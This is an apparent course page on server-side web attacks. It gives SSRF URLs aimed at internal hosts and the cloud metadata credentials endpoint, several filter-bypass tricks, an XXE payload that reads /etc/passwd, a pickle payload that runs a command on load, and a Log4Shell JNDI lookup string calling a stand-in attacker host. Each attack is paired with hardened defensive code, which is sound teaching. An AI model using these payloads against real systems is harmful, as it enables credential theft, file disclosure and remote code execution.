Web Application Security

Server-Side Attacks & Advanced Techniques

60 min

Server-Side Request Forgery (SSRF)

SSRF lets an attacker make the vulnerable server issue HTTP (or other) requests on their behalf: to internal systems that are unreachable from outside (admin panels, databases, services bound to the loopback interface) or to arbitrary external URLs. It is especially dangerous in cloud environments, where the instance metadata service is reachable from the server and hands out temporary credentials to anyone who can ask it.

SSRF ATTACK EXAMPLES
══════════════════════════════════════════════
# Basic SSRF - reach an internal service through the server
https://target.com/fetch?url=http://192.168.1.1/admin

# Cloud metadata theft (AWS; works directly against IMDSv1, IMDSv2 first requires a token obtained with a PUT request)
https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Filter bypass techniques against host blocklists
http://0.0.0.0/admin                  # 0.0.0.0 reaches the local host on Linux and is rarely blocklisted
http://127.1/admin                    # inet_aton shorthand for 127.0.0.1
http://2130706433/admin               # decimal representation of 127.0.0.1
http://target.com@127.0.0.1:80/admin  # userinfo trick: a check that reads the host as the text before "@" sees target.com, the request goes to 127.0.0.1
══════════════════════════════════════════════
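The examples above all defeat the same kind of check: a string blocklist applied to a hand-parsed "host". The following is an added example (not code from the original page): a naive validator of that kind beside a hardened one that parses the URL properly, normalises IP literals the way a real client would (via inet_aton), resolves hostnames, and then requires the resulting address to be globally routable. The names in FAKE_DNS and their addresses are constructed for the example so it runs offline; the hardened check takes the resolver as a parameter for that reason.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

BLOCKED_HOSTS = {"127.0.0.1", "localhost", "169.254.169.254"}

# Constructed stand-in for DNS so the example runs offline (hypothetical names and addresses).
FAKE_DNS = {
    "example.org": "1.2.3.4",      # an ordinary public address
    "internal.corp": "10.0.0.5",   # a name that resolves into the private network
}


def fake_resolve(host):
    return FAKE_DNS.get(host)


def naive_is_safe(url):
    """The kind of check the bypasses above defeat: pull the 'host' out of the
    URL by string splitting and compare it against an exact-match blocklist."""
    if not url.startswith(("http://", "https://")):
        return False
    host = url.split("://", 1)[1].split("/", 1)[0]
    return host not in BLOCKED_HOSTS


def _literal_ipv4(host):
    """Accept every shorthand libc's inet_aton accepts ('127.1', '2130706433'),
    because that is what curl-style HTTP clients will actually connect to."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def hardened_is_safe(url, resolve=fake_resolve):
    """Allow only http(s), take the host from a real URL parser (userinfo and
    port are stripped), normalise IP literals, resolve names, and require the
    resulting address to be globally routable."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname            # 'target.com@127.0.0.1:80' -> '127.0.0.1'
    if not host:
        return False
    ip = _literal_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)   # IPv6 literal such as ::1
        except ValueError:
            addr = resolve(host)
            if addr is None:
                return False                  # unresolvable: fail closed
            ip = ipaddress.ip_address(addr)
    # is_global is False for loopback, link-local (169.254/16), RFC 1918 space,
    # 0.0.0.0, multicast and reserved ranges, so one test covers every bypass above.
    return ip.is_global
```

Two caveats that the check alone does not cover: the HTTP client must connect to the address that was validated (pin the resolved IP or use a custom resolver), otherwise a DNS record that changes between the check and the connection, so-called DNS rebinding, reopens the hole; and every redirect the client follows must go through the same check, since the first hop can be a public host that redirects to 169.254.169.254.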

XML External Entity (XXE)

XXE attacks exploit XML parsers that honour external entity declarations in a DTD: the parser fetches the SYSTEM identifier (a file path or URL) and substitutes its contents where the entity is referenced. That gives local file disclosure, SSRF originating from the parser's host, and, through recursive entity expansion, denial of service.

XXE PAYLOAD
──────────────────────────────────────────────
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
→ Returns the contents of /etc/passwd as the text of <foo>
──────────────────────────────────────────────
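To see the parser behaviour concretely, here is an added example (not from the original page) using Python's expat-backed xml.sax reader, which since Python 3.7.1 leaves external general entities off by default. The code turns that feature back on to reproduce the leak, then shows the two mitigations a hardened parser applies: refusing any DTD outright and keeping external entity resolution disabled. The file content and temporary file stand in for /etc/passwd and are constructed for the example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed file content standing in for /etc/passwd; the example never reads a real system file.
SECRET_CONTENT = "root:x:0:0:root:/root:/bin/bash\n"


def build_xxe_document(path):
    """The payload above, pointed at an arbitrary local file."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://%s"> ]>\n'
        "<foo>&xxe;</foo>" % path
    )


class TextCollector(ContentHandler):
    """Gather the character data that ends up inside <foo>."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_with_entities(doc, resolve_external):
    """Parse with the SAX/expat reader. resolve_external=True restores the
    pre-3.7.1 behaviour: SYSTEM entities are fetched and inlined as text."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc.encode()))
    return "".join(handler.parts)


def parse_untrusted(doc):
    """Hardened entry point: no DOCTYPE means no entity declarations at all,
    and external entity resolution stays off as a second layer."""
    if "<!DOCTYPE" in doc:
        raise ValueError("DTDs are not accepted in untrusted XML")
    return parse_with_entities(doc, resolve_external=False)


def run_demo():
    """Write the stand-in secret, parse the payload three ways, clean up."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET_CONTENT)
    try:
        doc = build_xxe_document(path)
        leaked = parse_with_entities(doc, resolve_external=True)    # vulnerable
        withheld = parse_with_entities(doc, resolve_external=False)  # feature off
        try:
            parse_untrusted(doc)
            rejected = False
        except ValueError:
            rejected = True
    finally:
        os.remove(path)
    return {"leaked": leaked, "withheld": withheld, "rejected": rejected}
```

The same two switches exist in other parsers: lxml's XMLParser(resolve_entities=False, no_network=True), Java's disallow-doctype-decl feature on DocumentBuilderFactory, and the defusedxml wrappers for Python's stdlib modules. Rejecting the DOCTYPE is the simpler and more robust choice whenever the application never needs DTDs.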

Insecure Deserialization

Applications that deserialize untrusted data without validation are vulnerable to Remote Code Execution (RCE): the serialized stream does not just carry values, it tells the runtime which classes to instantiate, and a crafted stream picks classes (or a chain of them) whose construction or destruction runs attacker-chosen operations. Log4Shell in Apache Log4j 2 (CVE-2021-44228) is the best-known recent case of this family: a JNDI lookup embedded in a logged string contacted an attacker's LDAP server, and the object that server returned was either loaded as a remote class or deserialized by the JVM, leading to RCE.
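The mechanism is not specific to Java. The following added example (not code from the page or the Log4j project) shows the same pattern in Python's pickle: the serialized bytes name a callable to run on load, pickle.loads runs it before handing anything back, and a restricted Unpickler that only resolves allowlisted globals stops it. The "command" is a harmless echo constructed for the example; an attacker would substitute anything.

```python
import io
import pickle
import subprocess


class ShellOnLoad:
    """Attacker-crafted object: pickle stores the callable and arguments that
    __reduce__ returns, and pickle.loads calls them to rebuild the object."""

    def __reduce__(self):
        # Harmless stand-in for an attacker's command (constructed for the example).
        return (subprocess.check_output, (["echo", "pwned"],))


def make_payload():
    """What the attacker sends: a byte string, not code."""
    return pickle.dumps(ShellOnLoad())


BENIGN = {"user": "alice", "roles": ["admin"]}


def make_benign_payload():
    """What the application actually expected to receive."""
    return pickle.dumps(BENIGN)


def vulnerable_load(data):
    """The vulnerable pattern: deserialize whatever arrived.
    For make_payload() this runs the command and returns its output."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only explicitly allowed globals. A reference to subprocess, os,
    builtins.eval and so on fails before any object is built."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def hardened_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def hardened_load_rejects(data):
    """True when the restricted unpickler refuses the payload."""
    try:
        hardened_load(data)
    except pickle.UnpicklingError:
        return True
    return False
```

The allowlist is damage limitation, not a fix: the durable answer is a data-only format (JSON with schema validation) for anything that crosses a trust boundary. Java's equivalent of the restricted unpickler is the ObjectInputFilter introduced with JEP 290, and the equivalent of "no pickle at all" is the Log4j fix that removed JNDI lookups from message formatting.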

⚡ Log4Shell Impact

CVE-2021-44228 (CVSS 10.0) is among the most severe vulnerabilities disclosed in recent years. In Log4j 2 versions 2.0-beta9 through 2.14.1, any log statement whose message included user-controlled input could be made to perform a JNDI lookup (a string of the form ${jndi:ldap://attacker-host/a}) against an attacker-controlled LDAP server, and the reference or serialized object that server returned led to arbitrary code execution. Because Log4j 2 is embedded in a very large share of Java software, the exposure was global; version 2.15.0 restricted the lookup and subsequent releases removed message lookups and disabled JNDI by default.
